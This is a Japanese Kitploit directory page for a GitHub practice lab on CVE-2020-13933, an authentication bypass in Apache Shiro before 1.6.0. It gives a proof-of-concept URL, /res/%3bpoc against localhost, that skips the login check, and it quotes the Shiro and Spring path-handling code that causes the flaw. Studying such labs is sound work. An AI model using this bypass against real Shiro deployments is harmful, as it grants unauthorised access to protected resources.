Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-13933 — CVE-2020-13933 演習環境: shiro 認証バイパス脆弱性 | Kitploit
ツール/GitHubGitHub/exp-docs/cve-2020-13933
認証と認可脆弱性分析ウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubexp-docs/cve-2020-13933

CVE-2020-13933

CVE-2020-13933 演習環境: shiro 認証バイパス脆弱性

リポジトリを見る
1443年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2020-13933 ラボ

shiro < 1.6.0 認証バイパス脆弱性


PoC

http://127.0.0.1:8080/res/%3bpoc

ラボ環境

コード説明

  • ShiroConfig.java:
      権限設定。/res/* リソースへのリクエスト時に、302でログインページにリダイレクトし認証を行う。
  • NameController.java:
      ・ /res/{name}: name という名前のリソースをリクエスト(認証をトリガー)
      ・ /res/: リソースをリクエストしない(認証をトリガーしない)

ラボ検証

リクエストルートにリソース名を指定しない場合、認証はトリガーされず、リソースも返されません: http://127.0.0.1:8080/res/

リクエストルートにリソース名を指定した場合、302で認証ページにリダイレクトします: http://127.0.0.1:8080/res/poc

特定のPoCリクエストを構築してリソースを指定した場合、認証はトリガーされず、リソースが返されます: http://127.0.0.1:8080/res/%3bpoc (%3b は ; のURLエンコード)

脆弱性 DEBUG 位置

shiro-web-1.5.3.jar

root@kitploit:~
// org.apache.shiro.web.util.WebUtils.java
// line 111

public static String getPathWithinApplication(HttpServletRequest request) {
    return normalize(removeSemicolon(getServletPath(request) + getPathInfo(request)));
}

spring-web-5.2.5.RELEASE.jar

root@kitploit:~
// org.springframework.web.util.UrlPathHelper.java
// line 459

private String decodeAndCleanUriString(HttpServletRequest request, String uri) {
    uri = removeSemicolonContent(uri);
    uri = decodeRequestString(request, uri);
    uri = getSanitizedPath(uri);
    return uri;
}
ツールをダウンロード